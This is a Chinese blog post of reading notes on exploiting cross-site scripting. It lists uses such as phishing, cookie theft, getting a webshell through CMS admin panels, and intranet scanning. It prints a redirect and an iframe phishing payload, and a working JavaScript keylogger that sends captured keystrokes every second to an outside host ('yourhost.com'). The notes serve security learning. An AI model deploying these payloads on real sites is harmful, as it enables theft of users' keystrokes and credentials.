• xss跨站脚本攻击与防御读书笔记(原创)


    XSS在客户端执行 可以任意执行js代码

       0x01  xss 的利用方式

    1. 钓鱼      案例:http://www.wooyun.org/bugs/wooyun-2014-076685  我是如何通过一个 XSS 探测搜狐内网扫描内网并且蠕动到前台的

    2.钓鱼,伪造操作界面钓鱼

     直接跳转
    <script>document.location.href="http://test.com/xxx.htm"
    

     iframe钓鱼

    <iframe src="http://test.com/11.htm" heigt="100%" width="100%">
    

    flash钓鱼

    http://www.wooyun.org/bugs/wooyun-2010-02532   

     

    3.弹广告刷流量

    4.任意POST/GET操作

       如在dz中 后台的储存型XSS可以get uckey,或者get webshell 案例 

    http://www.wooyun.org/bugs/wooyun-2010-045716

     在dedecms中 一个储存XSS配合后台文件管理器 getshell

     案例: dedecms利用xss+csrf getshell

    http://huakai.paxmac.org/?p=587

    wordpess中储存XSS配合模板getshell

     5.html5 中还可以截图

    6.窃取cookies

    XSS盲打类的

    7.XSS键盘记录

    var keys='';document.onkeypress = function(e) 
    { get = window.event?event:e;
    key = get.keyCode?get.keyCode:get.charCode;
    key = String.fromCharCode(key);
    keys+=key;}window.setInterval(function()
    {
    new Image().src = 'http://yourhost.com/g.php?c='+keys; keys = '';}, 1000);

      

     8.客户端信息的刺探

      扫描内网
    自动提交st2漏洞(案列在黑哥的PPT里面)
    ip地址

    9.xssworm
    10.ddos

  • 相关阅读:
    FZU 1005 Fast Food(dp)
    POJ 3186 Treats for the Cows(区间DP)
    2016郑州轻工业学院校赛 B 蛤玮的财宝
    c++大数模板
    2015轻院校赛 H五子棋
    poj 1015 Jury Compromise
    modbus协议说明(转)
    STM32 flash 内存分布介绍
    STM32 程序所占用空间计算 && FLASH存储的起始地址计算
    C float与char数组 互转
  • 原文地址:https://www.cnblogs.com/dongchi/p/4166799.html
Copyright © 2020-2023  润新知